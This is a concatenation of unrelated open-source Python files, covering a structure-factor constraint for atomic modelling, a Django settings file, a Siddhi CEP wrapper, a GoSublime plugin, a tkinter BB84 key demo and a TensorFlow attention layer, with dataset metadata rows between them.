# http://erice2011.docking.org/upload/Other/Billinge_PDF/03-ReadingMaterial/BillingePDF2011.pdf page 6
#import time
#startTime = time.clock()
output = {}
for pair in self.__elementsPairs:
output["sf_intra_%s-%s" % pair] = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
output["sf_inter_%s-%s" % pair] = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
output["sf_total_%s-%s" % pair] = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
gr = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
for pair in self.__elementsPairs:
# get weighting scheme
wij = self.__weightingScheme.get(pair[0]+"-"+pair[1], None)
if wij is None:
wij = self.__weightingScheme[pair[1]+"-"+pair[0]]
# get number of atoms per element
ni = self.engine.numberOfAtomsPerElement[pair[0]]
nj = self.engine.numberOfAtomsPerElement[pair[1]]
# get index of element
idi = self.engine.elements.index(pair[0])
idj = self.engine.elements.index(pair[1])
# get Nij
if idi == idj:
Nij = ni*(ni-1)/2.0
output["sf_intra_%s-%s" % pair] += data["intra"][idi,idj,:]
output["sf_inter_%s-%s" % pair] += data["inter"][idi,idj,:]
else:
Nij = ni*nj
output["sf_intra_%s-%s" % pair] += data["intra"][idi,idj,:] + data["intra"][idj,idi,:]
output["sf_inter_%s-%s" % pair] += data["inter"][idi,idj,:] + data["inter"][idj,idi,:]
# compute g(r)
nij = output["sf_intra_%s-%s" % pair] + output["sf_inter_%s-%s" % pair]
dij = nij/self.__shellVolumes
Dij = Nij/self.engine.volume
gr += wij*dij/Dij
# calculate intensityFactor
intensityFactor = (self.engine.volume*wij)/(Nij*self.__shellVolumes)
# divide by factor
output["sf_intra_%s-%s" % pair] *= intensityFactor
output["sf_inter_%s-%s" % pair] *= intensityFactor
output["sf_total_%s-%s" % pair] = output["sf_intra_%s-%s" % pair] + output["sf_inter_%s-%s" % pair]
# Compute S(q) from G(r)
output["sf_intra_%s-%s" % pair] = self._get_Sq_from_Gr(output["sf_intra_%s-%s" % pair])
output["sf_inter_%s-%s" % pair] = self._get_Sq_from_Gr(output["sf_inter_%s-%s" % pair])
output["sf_total_%s-%s" % pair] = self._get_Sq_from_Gr(output["sf_total_%s-%s" % pair])
# compute total G(r)
rho0 = (self.engine.numberOfAtoms/self.engine.volume).astype(FLOAT_TYPE)
Gr = (FLOAT_TYPE(4.)*PI*self.__shellCenters*rho0) * (gr-1)
# Compute S(q) from G(r)
Sq = self._get_Sq_from_Gr(Gr)
# multiply by scale factor
output["total_no_window"] = self._apply_scale_factor(Sq, self._fittedScaleFactor)
# apply multiframe prior and weight
if applyMultiframePrior:
output["total_no_window"] = self._apply_multiframe_prior(output["total_no_window"])
# convolve total with window function
if self.__windowFunction is not None:
output["total"] = np.convolve(output["total_no_window"], self.__windowFunction, 'same').astype(FLOAT_TYPE)
else:
output["total"] = output["total_no_window"]
return output
def get_constraint_value(self, applyMultiframePrior=True):
"""
Compute all partial Structure Factor (SQs).
:Parameters:
#. applyMultiframePrior (boolean): Whether to apply subframe weight
and prior to the total. This will only have an effect when used
frame is a subframe and in case subframe weight and prior is
defined.
:Returns:
#. SQs (dictionary): The SQs dictionnary, where keys are the
element wise intra and inter molecular SQs and values are
the computed SQs.
"""
if self.data is None:
LOGGER.warn("data must be computed first using 'compute_data' method.")
return {}
return self._get_constraint_value(self.data, applyMultiframePrior=applyMultiframePrior)
def get_constraint_original_value(self):
"""
Compute all partial Pair Distribution Functions (PDFs).
:Returns:
#. PDFs (dictionary): The PDFs dictionnary, where keys are the
element wise intra and inter molecular PDFs and values are the
computed PDFs.
"""
if self.originalData is None:
LOGGER.warn("originalData must be computed first using 'compute_data' method.")
return {}
return self._get_constraint_value(self.originalData)
@reset_if_collected_out_of_date
def compute_data(self, update=True):
""" Compute constraint's data.
:Parameters:
#. update (boolean): whether to update constraint data and
standard error with new computation. If data is computed and
updated by another thread or process while the stochastic
engine is running, this might lead to a state alteration of
the constraint which will lead to a no additional accepted
moves in the run
:Returns:
#. data (dict): constraint data dictionary
#. standardError (float): constraint standard error
"""
intra,inter = full_pairs_histograms_coords( boxCoords = self.engine.boxCoordinates,
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex,
elementIndex = self.engine.elementsIndex,
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
ncores = self.engine._runtime_ncores )
# create data and compute standard error
data = {"intra":intra, "inter":inter}
totalSQ = self.__get_total_Sq(data, rho0=self.engine.numberDensity)
stdError = self.compute_standard_error(modelData = totalSQ)
# update
if update:
self.set_data(data)
self.set_active_atoms_data_before_move(None)
self.set_active_atoms_data_after_move(None)
self.set_standard_error(stdError)
# set original data
if self.originalData is None:
self._set_original_data(self.data)
# return
return data, stdError
def compute_before_move(self, realIndexes, relativeIndexes):
"""
Compute constraint before move is executed
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Group atoms relative index
the move will be applied to.
"""
intraM,interM = multiple_pairs_histograms_coords( indexes = relativeIndexes,
boxCoords = self.engine.boxCoordinates,
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex,
elementIndex = self.engine.elementsIndex,
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
allAtoms = True,
ncores = self.engine._runtime_ncores )
intraF,interF = full_pairs_histograms_coords( boxCoords = self.engine.boxCoordinates[relativeIndexes],
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex[relativeIndexes],
elementIndex = self.engine.elementsIndex[relativeIndexes],
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
ncores = self.engine._runtime_ncores )
self.set_active_atoms_data_before_move( {"intra":intraM-intraF, "inter":interM-interF} )
self.set_active_atoms_data_after_move(None)
def compute_after_move(self, realIndexes, relativeIndexes, movedBoxCoordinates):
"""
Compute constraint after move is executed
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Group atoms relative index
the move will be applied to.
#. movedBoxCoordinates (numpy.ndarray): The moved atoms new coordinates.
"""
# change coordinates temporarily
boxData = np.array(self.engine.boxCoordinates[relativeIndexes], dtype=FLOAT_TYPE)
self.engine.boxCoordinates[relativeIndexes] = movedBoxCoordinates
# calculate pair distribution function
intraM,interM = multiple_pairs_histograms_coords( indexes = relativeIndexes,
boxCoords = self.engine.boxCoordinates,
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex,
elementIndex = self.engine.elementsIndex,
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
allAtoms = True,
ncores = self.engine._runtime_ncores )
intraF,interF = full_pairs_histograms_coords( boxCoords = self.engine.boxCoordinates[relativeIndexes],
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex[relativeIndexes],
elementIndex = self.engine.elementsIndex[relativeIndexes],
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
ncores = self.engine._runtime_ncores )
# set active atoms data
self.set_active_atoms_data_after_move( {"intra":intraM-intraF, "inter":interM-interF} )
# reset coordinates
self.engine.boxCoordinates[relativeIndexes] = boxData
# compute standardError after move
dataIntra = self.data["intra"]-self.activeAtomsDataBeforeMove["intra"]+self.activeAtomsDataAfterMove["intra"]
dataInter = self.data["inter"]-self.activeAtomsDataBeforeMove["inter"]+self.activeAtomsDataAfterMove["inter"]
totalSQ = self.__get_total_Sq({"intra":dataIntra, "inter":dataInter}, rho0=self.engine.numberDensity)
self.set_after_move_standard_error( self.compute_standard_error(modelData = totalSQ) )
# increment tried
self.increment_tried()
def accept_move(self, realIndexes, relativeIndexes):
"""
Accept move
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Not used here.
"""
dataIntra = self.data["intra"]-self.activeAtomsDataBeforeMove["intra"]+self.activeAtomsDataAfterMove["intra"]
dataInter = self.data["inter"]-self.activeAtomsDataBeforeMove["inter"]+self.activeAtomsDataAfterMove["inter"]
# change permanently _data
self.set_data( {"intra":dataIntra, "inter":dataInter} )
# reset activeAtoms data
self.set_active_atoms_data_before_move(None)
self.set_active_atoms_data_after_move(None)
# update standardError
self.set_standard_error( self.afterMoveStandardError )
self.set_after_move_standard_error( None )
# set new scale factor
self._set_fitted_scale_factor_value(self._fittedScaleFactor)
# increment accepted
self.increment_accepted()
def reject_move(self, realIndexes, relativeIndexes):
"""
Reject move
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Not used here.
"""
# reset activeAtoms data
self.set_active_atoms_data_before_move(None)
self.set_active_atoms_data_after_move(None)
# update standardError
self.set_after_move_standard_error( None )
def compute_as_if_amputated(self, realIndex, relativeIndex):
"""
Compute and return constraint's data and standard error as if
given atom is amputated.
:Parameters:
#. realIndex (numpy.ndarray): Atom's index as a numpy array
of a single element.
#. relativeIndex (numpy.ndarray): Atom's relative index as a
numpy array of a single element.
"""
# compute data
self.compute_before_move(realIndexes=realIndex, relativeIndexes=relativeIndex)
dataIntra = self.data["intra"]-self.activeAtomsDataBeforeMove["intra"]
dataInter = self.data["inter"]-self.activeAtomsDataBeforeMove["inter"]
data = {"intra":dataIntra, "inter":dataInter}
# temporarily adjust self.__weightingScheme
weightingScheme = self.__weightingScheme
relativeIndex = relativeIndex[0]
selectedElement = self.engine.allElements[relativeIndex]
self.engine.numberOfAtomsPerElement[selectedElement] -= 1
self.__weightingScheme = get_normalized_weighting(numbers=self.engine.numberOfAtomsPerElement, weights=self._elementsWeight )
for k in self.__weightingScheme:
self.__weightingScheme[k] = FLOAT_TYPE(self.__weightingScheme[k])
## END OF ADDED 08 FEB 2017
# compute standard error
if not self.engine._RT_moveGenerator.allowFittingScaleFactor:
SF = self.adjustScaleFactorFrequency
self._set_adjust_scale_factor_frequency(0)
rho0 = ((self.engine.numberOfAtoms-1)/self.engine.volume).astype(FLOAT_TYPE)
totalSQ = self.__get_total_Sq(data, rho0=rho0)
standardError = self.compute_standard_error(modelData = totalSQ)
if not self.engine._RT_moveGenerator.allowFittingScaleFactor:
self._set_adjust_scale_factor_frequency(SF)
# reset activeAtoms data
self.set_active_atoms_data_before_move(None)
# set amputation
self.set_amputation_data( {'data':data, 'weightingScheme':self.__weightingScheme} )
# compute standard error
self.set_amputation_standard_error( standardError )
# reset weightingScheme and number of atoms per element
self.__weightingScheme = weightingScheme
self.engine.numberOfAtomsPerElement[selectedElement] += 1
def accept_amputation(self, realIndex, relativeIndex):
"""
Accept amputated atom and sets constraints data and standard error accordingly.
:Parameters:
#. realIndex (numpy.ndarray): Not used here.
#. relativeIndex (numpy.ndarray): Not used here.
"""
#self.set_data( self.amputationData ) ## COMMENTED 08 FEB 2017
self.set_data( self.amputationData['data'] )
self.__weightingScheme = self.amputationData['weightingScheme']
self.set_standard_error( self.amputationStandardError )
self.set_amputation_data( None )
self.set_amputation_standard_error( None )
# set new scale factor
self._set_fitted_scale_factor_value(self._fittedScaleFactor)
def reject_amputation(self, realIndex, relativeIndex):
"""
Reject amputated atom and set constraint's data and standard
error accordingly.
:Parameters:
#. realIndex (numpy.ndarray): Not used here.
#. relativeIndex (numpy.ndarray): Not used here.
"""
self.set_amputation_data( None )
self.set_amputation_standard_error( None )
def _on_collector_collect_atom(self, realIndex):
pass
def _on_collector_release_atom(self, realIndex):
pass
def _constraint_copy_needs_lut(self):
return {'_StructureFactorConstraint__elementsPairs' :'_StructureFactorConstraint__elementsPairs',
'_StructureFactorConstraint__histogramSize' :'_StructureFactorConstraint__histogramSize',
'_StructureFactorConstraint__weightingScheme' :'_StructureFactorConstraint__weightingScheme',
'_StructureFactorConstraint__shellVolumes' :'_StructureFactorConstraint__shellVolumes',
'_StructureFactorConstraint__shellCenters' :'_StructureFactorConstraint__shellCenters',
'_StructureFactorConstraint__windowFunction' :'_StructureFactorConstraint__windowFunction',
'_StructureFactorConstraint__experimentalQValues' :'_StructureFactorConstraint__experimentalQValues',
'_StructureFactorConstraint__experimentalSF' :'_StructureFactorConstraint__experimentalSF',
'_StructureFactorConstraint__Gr2SqMatrix' :'_StructureFactorConstraint__Gr2SqMatrix',
'_StructureFactorConstraint__minimumDistance' :'_StructureFactorConstraint__minimumDistance',
'_StructureFactorConstraint__maximumDistance' :'_StructureFactorConstraint__maximumDistance',
'_StructureFactorConstraint__bin' :'_StructureFactorConstraint__bin',
'_ExperimentalConstraint__scaleFactor' :'_ExperimentalConstraint__scaleFactor',
'_ExperimentalConstraint__dataWeights' :'_ExperimentalConstraint__dataWeights',
'_ExperimentalConstraint__multiframePrior' :'_ExperimentalConstraint__multiframePrior',
'_ExperimentalConstraint__multiframeWeight' :'_ExperimentalConstraint__multiframeWeight',
'_ExperimentalConstraint__limits' :'_ExperimentalConstraint__limits',
'_ExperimentalConstraint__limitsIndexStart' :'_ExperimentalConstraint__limitsIndexStart',
'_ExperimentalConstraint__limitsIndexEnd' :'_ExperimentalConstraint__limitsIndexEnd',
'_Constraint__used' :'_Constraint__used',
'_Constraint__data' :'_Constraint__data',
'_Constraint__state' :'_Constraint__state',
'_Constraint__standardError' :'_Constraint__standardError',
'_fittedScaleFactor' :'_fittedScaleFactor',
'_usedDataWeights' :'_usedDataWeights',
'_Engine__state' :'_Engine__state',
'_Engine__boxCoordinates' :'_Engine__boxCoordinates',
'_Engine__basisVectors' :'_Engine__basisVectors',
'_Engine__isPBC' :'_Engine__isPBC',
'_Engine__moleculesIndex' :'_Engine__moleculesIndex',
'_Engine__elementsIndex' :'_Engine__elementsIndex',
'_Engine__numberOfAtomsPerElement' :'_Engine__numberOfAtomsPerElement',
'_Engine__elements' :'_Engine__elements',
'_Engine__numberDensity' :'_Engine__numberDensity',
'_Engine__volume' :'_Engine__volume',
'_Engine__realCoordinates' :'_Engine__realCoordinates',
'_atomsCollector' :'_atomsCollector',
('engine','_atomsCollector') :'_atomsCollector',
}
def plot(self, xlabelParams={'xlabel':'$Q(\\AA^{-1})$', 'size':10},
ylabelParams={'ylabel':'$S(Q)$', 'size':10},
**kwargs):
"""
Alias to ExperimentalConstraint.plot with additional parameters
:Additional/Adjusted Parameters:
#. xlabelParams (None, dict): modified matplotlib.axes.Axes.set_xlabel
parameters.
#. ylabelParams (None, dict): modified matplotlib.axes.Axes.set_ylabel
parameters.
"""
return super(StructureFactorConstraint, self).plot(xlabelParams= xlabelParams,
ylabelParams= ylabelParams,
**kwargs)
class ReducedStructureFactorConstraint(StructureFactorConstraint):
"""
The Reduced Structure Factor that we will also note S(Q)
is exactly the same quantity as the Structure Factor but with
the slight difference that it is normalized to 0 rather than 1
and therefore :math:`<S(Q)>=0`.
The computation of S(Q) is done through a Sine inverse Fourier transform
of the computed pair distribution function noted as G(r).
.. math::
S(Q) = \\frac{1}{Q} \\int_{0}^{\\infty} G(r) sin(Qr) dr
The only reason why the Reduced Structure Factor is implemented, is because
many experimental data are treated in this form. And it is just convenient
not to manipulate the experimental data every time.
"""
def _get_Sq_from_Gr(self, Gr):
return np.sum(Gr.reshape((-1,1))*self.Gr2SqMatrix, axis=0)
def _apply_scale_factor(self, Sq, scaleFactor):
if scaleFactor != 1:
Sq = scaleFactor*Sq
return Sq
def get_adjusted_scale_factor(self, experimentalData, modelData, dataWeights):
""" dummy overload that does exactly the same thing
"""
SF = self.scaleFactor
# check to update scaleFactor
if self.adjustScaleFactorFrequency:
if not self.engine.accepted%self.adjustScaleFactorFrequency:
SF = self.fit_scale_factor(experimentalData, modelData, dataWeights)
return SF
def plot(self, xlabelParams={'xlabel':'$Q(\\AA^{-1})$', 'size':10},
ylabelParams={'ylabel':'$S(Q)-1$', 'size':10},
**kwargs):
"""
Alias to ExperimentalConstraint.plot with additional parameters
:Additional/Adjusted Parameters:
#. xlabelParams (None, dict): modified matplotlib.axes.Axes.set_xlabel
parameters.
#. ylabelParams (None, dict): modified matplotlib.axes.Axes.set_ylabel
parameters.
"""
return super(StructureFactorConstraint, self).plot(xlabelParams= xlabelParams,
ylabelParams= ylabelParams,
**kwargs)
| agpl-3.0 | 7,406,735,951,820,464,000 | 49.032659 | 178 | 0.575891 | false | 4.479081 | false | false | false |
pedroluislopez/candidaturas | candidaturas/settings.py | 1 | 2424 | """
Django settings for candidaturas project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.conf.global_settings import MEDIA_URL
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^-c)soc5oay)1a74+8$xe!jf)3@lro!1^xaxscz$f$peju@xto'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'candidatos',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'candidaturas.urls'
WSGI_APPLICATION = 'candidaturas.wsgi.application'
DATABASE_NAME = ''
DATABASE_USER = ''
DATABASE_PASSWORD = ''
try:
from local_settings import *
except ImportError:
pass
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': DATABASE_NAME,
'USER': DATABASE_USER,
'PASSWORD': DATABASE_PASSWORD,
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'es'
TIME_ZONE = 'Europe/Madrid'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
| gpl-3.0 | -6,178,601,633,671,091,000 | 23.484848 | 71 | 0.720297 | false | 3.271255 | false | false | false |
madhawav/SiddhiCEPPythonAPI | SiddhiCEP3/core/event/ComplexEvent.py | 1 | 3787 | from enum import Enum
from SiddhiCEP3 import SiddhiLoader
from SiddhiCEP3.DataTypes.DataWrapper import unwrapData, wrapData
class ComplexEvent(object):
class Type(Enum):
CURRENT = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")().CURRENT(),
EXPIRED = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")().EXPIRED(),
TIMER = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")().TIMER(),
RESET = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")().RESET()
@classmethod
def _map_value(cls, type_proxy):
type_value = None
if type_proxy.isValueCurrent():
type_value = ComplexEvent.Type.CURRENT
elif type_proxy.isValueExpired():
type_value = ComplexEvent.Type.EXPIRED
elif type_proxy.isValueTimer():
type_value = ComplexEvent.Type.TIMER
elif type_proxy.isValueReset():
type_value = ComplexEvent.Type.RESET
else:
raise TypeError("Unknown Complex Event Type")
return ComplexEvent.Type(type_value)
def __init__(self,):
raise NotImplementedError("Complex Event is Abstract")
def __new__(cls):
bare_instance = object.__new__(cls)
bare_instance._complex_event_proxy = None
return bare_instance
@classmethod
def _fromComplexEventProxy(cls, complex_event_proxy):
'''
Internal Constructor to wrap around JAVA Interface Complex Event
:param complex_event_proxy:
:return:
'''
if complex_event_proxy is None:
return None
instance = cls.__new__(cls)
instance._complex_event_proxy = complex_event_proxy
return instance
def getNext(self):
next_proxy = self._complex_event_proxy.getNext()
return ComplexEvent._fromComplexEventProxy(next_proxy)
def setNext(self, next_event):
self._complex_event_proxy.setNext(next_event._complex_event_proxy)
next = property(getNext, setNext)
def getOutputData(self):
complex_event_static_proxy = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.ComplexEventProxy")()
output_data = unwrapData(complex_event_static_proxy.getOutputData(self._complex_event_proxy))
return output_data
def setOutputData(self, datum, index):
#TODO: Improve logic here by adding support to long. Will need to make a java wrapping for handling long
complex_event_static_proxy = SiddhiLoader._loadType(
"org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.ComplexEventProxy")()
complex_event_static_proxy.setOutputData(self._complex_event_proxy,wrapData(datum),index)
def getTimestamp(self):
return self._complex_event_proxy.getTimestamp()
timestamp = property(fget=getTimestamp, fset=None)
def getAttribute(self, position):
return self._complex_event_proxy.getAttribute(position)
def setAttribute(self, value, position):
#TODO: Improve logic here by adding support to long. Will need to make a java wrapping for handling long
self._complex_event_proxy.setAttribute(value,position)
def getType(self):
raw_type_proxy = self._complex_event_proxy.getType()
type_proxy = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")(raw_type_proxy)
return ComplexEvent.Type._map_value(type_proxy)
def setType(self, type):
self._complex_event_proxy.setType(type.value())
type = property(getType, setType)
| apache-2.0 | -1,473,881,451,016,611,300 | 41.550562 | 139 | 0.675469 | false | 3.779441 | false | false | false |
DisposaBoy/GoSublime | gsev.py | 1 | 2415 | from .gosubl import gs
from . import gstest
import sublime
import sublime_plugin
import webbrowser
DOMAIN = 'GsEV'
class EV(sublime_plugin.EventListener):
def on_pre_save(self, view):
view.run_command('gs_fmt')
sublime.set_timeout(lambda: do_set_gohtml_syntax(view), 0)
def on_post_save(self, view):
sublime.set_timeout(lambda: do_post_save(view), 0)
def on_activated(self, view):
win = view.window()
if win is not None:
active_view = win.active_view()
if active_view is not None:
sublime.set_timeout(lambda: do_sync_active_view(active_view), 0)
sublime.set_timeout(lambda: do_set_gohtml_syntax(view), 0)
def on_load(self, view):
sublime.set_timeout(lambda: do_set_gohtml_syntax(view), 0)
class GsOnLeftClick(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
if gs.is_go_source_view(view):
view.run_command('gs9o_open', {
"run": [".actuate", "-button=left"],
"focus_view": False,
"show_view": False,
})
elif view.score_selector(gs.sel(view).begin(), "text.9o") > 0:
view.window().run_command("gs9o_open_selection")
class GsOnRightClick(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
if gs.is_go_source_view(view):
view.run_command('gs9o_open', {
"run": [".actuate", "-button=right"],
"focus_view": False,
"show_view": False,
})
def do_post_save(view):
if not gs.is_pkg_view(view):
return
for c in gs.setting('on_save', []):
cmd = c.get('cmd', '')
args = c.get('args', {})
msg = 'running on_save command %s' % cmd
tid = gs.begin(DOMAIN, msg, set_status=False)
try:
view.run_command(cmd, args)
except Exception as ex:
gs.notice(DOMAIN, 'Error %s' % ex)
finally:
gs.end(tid)
def do_sync_active_view(view):
fn = view.file_name() or ''
gs.set_attr('active_fn', fn)
if fn:
gs.set_attr('last_active_fn', fn)
if fn.lower().endswith('.go'):
gs.set_attr('last_active_go_fn', fn)
win = view.window()
if win is not None and view in win.views():
m = {}
psettings = view.settings().get('GoSublime')
if psettings and gs.is_a(psettings, {}):
m = gs.mirror_settings(psettings)
gs.set_attr('last_active_project_settings', gs.dval(m, {}))
gs.sync_settings()
def do_set_gohtml_syntax(view):
fn = view.file_name()
xl = gs.setting('gohtml_extensions', [])
if xl and fn and fn.lower().endswith(tuple(xl)):
view.set_syntax_file(gs.tm_path('gohtml'))
| mit | -5,356,420,796,553,315,000 | 25.538462 | 68 | 0.657971 | false | 2.616468 | false | false | false |
DQE-Polytech-University/HI | src/console2.py | 1 | 2564 | from tkinter import *
import numpy as np
import math
import Classes as hi
def Insert():
name = text1.get()
Text1.insert(END, name)
text.delete(0,END)
def Key_issue():
bases = text1.get()
long_message = text2.get()
bb84 = hi.Various_measurement(int(bases),int(long_message),0)
bb84.begin()
bb84.compare_bob_alice()
bb84.generate_key()
key = bb84.key
Text1.insert(END, key)
#text.delete(0,END)
root = Tk()
root.title('Encrypt me =P')
root.resizable(False, False)
root.geometry('800x550')
text1 = Entry(root, bg = 'white')
text2 = Entry(root, bg = 'white')
Text1 = Listbox(root,height=15,width=35,bd=0)
Text2 = Listbox(root,height=15,width=35,bd=0)
listbox1=Listbox(root,height=6,width=20,selectmode=EXTENDED)
list1=["Hadamard","NOT","Gate_pi","Gate_pi8","Gate_turn","CNOT"]
for i in list1:
listbox1.insert(END,i)
listbox1.pack()
listbox1.place(x=400, y=35)
post_user = Text(root,height=10,width=32,font='Arial 14',wrap=WORD)
Text1.pack()
Text2.pack()
text1.pack()
text2.pack()
post_user.pack()
text1.place(x=230, y=10)
text2.place(x=230, y=40)
Text1.place(x=400, y= 270)
Text2.place(x=550, y= 270)
post_user.place(x=5, y= 270)
#scrollbar['command'] = Text2.xview
#Text2['yscrollcommand'] = scrollbar.set
def delete():
Text1.delete(0,END)
Text1 = Listbox(Text1)
Text1.pack()
Button1 = Button(root, text="Enter the number of bases:", width=30)
Button2 = Button(root, text="Enter the length of the message:", width=30)
Button3 = Button(root, text="Encrypt message", width=30)
Button4 = Button(root, text="Issue key", width=30, command=Key_issue)
Button5 = Button(root, text="Decrypt message", width=30)
Button6 = Button(root, text="Clear all items", width=30, command=delete)
Button7 = Button(root, text='Exit', width=30, command=root.destroy)
Button9 = Button(root, text="Enter your message:", width=30,bg='green',fg='white')
Button10 = Button(root, text="Our keys:", width=16)
Button11 = Button(root, text="The encrypted message:", width=30)
Button8 = Button(root, text="Select gate:", width=16)
Button1.pack()
Button2.pack()
Button3.pack()
Button4.pack()
Button5.pack()
Button6.pack()
Button7.pack()
Button8.pack()
Button9.pack()
Button10.pack()
Button11.pack()
Button1.place(x=0, y=5)
Button2.place(x=0, y=35)
Button3.place(x=0, y=65)
Button4.place(x=0, y=95)
Button5.place(x=0, y=125)
Button6.place(x=0, y=155)
Button7.place(x=0, y=185)
Button9.place(x=0, y=235)
Button10.place(x=400, y=235)
Button11.place(x=550, y=235)
Button8.place(x=400, y=5)
root.mainloop()
| mit | -945,591,217,603,901,400 | 22.522936 | 82 | 0.688768 | false | 2.579477 | false | false | false |
ashtonteng/squad_exp | AttentionLayer.py | 1 | 3451 | import tensorflow as tf
from tensorflow.contrib import rnn
import numpy as np
import os
os.environ["TF_CPP_MIN_LOG_LEVEL"]="2"
class AttentionLayer():
"""Implements Context-to-Query Attention. Pays attention to different parts of the query when
reading the passage. Returns, for each word in the passage, a weighted vector of questions."""
def __init__(self, args, p_inputs, q_inputs, scope):
"""p_inputs: batch_size x p_length x hidden_size"""
"""q_inputs: batch_size x q_length x hidden_size"""
print("building attention layer", scope)
batch_size = args.batch_size
vocab_size = args.vocab_size
hidden_size = args.AttentionLayer_size
model = args.model
num_layers = args.num_layers
training = args.training
with tf.name_scope(scope):
p_inputs_shape = tf.shape(p_inputs)
q_inputs_shape = tf.shape(q_inputs)
p_length = p_inputs_shape[1]
q_length = q_inputs_shape[1]
p_inputs_aug = tf.tile(tf.expand_dims(p_inputs, 2), [1, 1, q_length, 1]) #batch_size x p_length x q_length x hidden_size
q_inputs_aug = tf.tile(tf.expand_dims(q_inputs, 1), [1, p_length, 1, 1]) #batch_size x p_length x q_length x hidden_size
pq_elementwise = tf.multiply(p_inputs_aug, q_inputs_aug) #batch_size x p_length x q_length x hidden_size
combo_input = tf.concat([p_inputs_aug, q_inputs_aug, pq_elementwise], axis=3) #batch_size x p_length x q_length x 3*hidden_size
with tf.variable_scope(scope):
w_sim = tf.get_variable("w_sim", [3*hidden_size, 1])
#in order to matmul combo_input with w_sim, we need to first tile w_sim batch_size number of times, and flatten combo_input
combo_input_flat = tf.reshape(combo_input, [batch_size, -1, 3*hidden_size]) #batch_size x p_length*q_length x 3*hidden_size
w_sim_tiled = tf.tile(tf.expand_dims(w_sim, 0), [batch_size, 1, 1]) #batch_size x 3*hidden_size x 1
sim_mtx_flat = tf.matmul(combo_input_flat, w_sim_tiled) #batch_size x p_length*q_length x 1
sim_mtx = tf.reshape(sim_mtx_flat, [batch_size, p_length, q_length, 1]) #batch_size x p_length x q_length x 1
#C2Q attention: how relevant are the query words to each context word?
#a #for each p, find weights to put on q. ##batch_size x p_length x q_length x hidden_size
att_on_q = tf.nn.softmax(sim_mtx, dim=2)
#q_inputs_aug = batch_size x p_length x q_length x hidden_size
weighted_q = tf.multiply(att_on_q, q_inputs_aug)
linear_combo_q_for_each_p = tf.reduce_sum(weighted_q, axis=2) #batch_size x p_length x hidden_size
#Q2C Attention: which context words have the closest similarity to one of the query words?
#for each context word choose which query word it helps contribute to the most
#then normalize over all context words, to get a distribution of helpfulness of all context words to this query
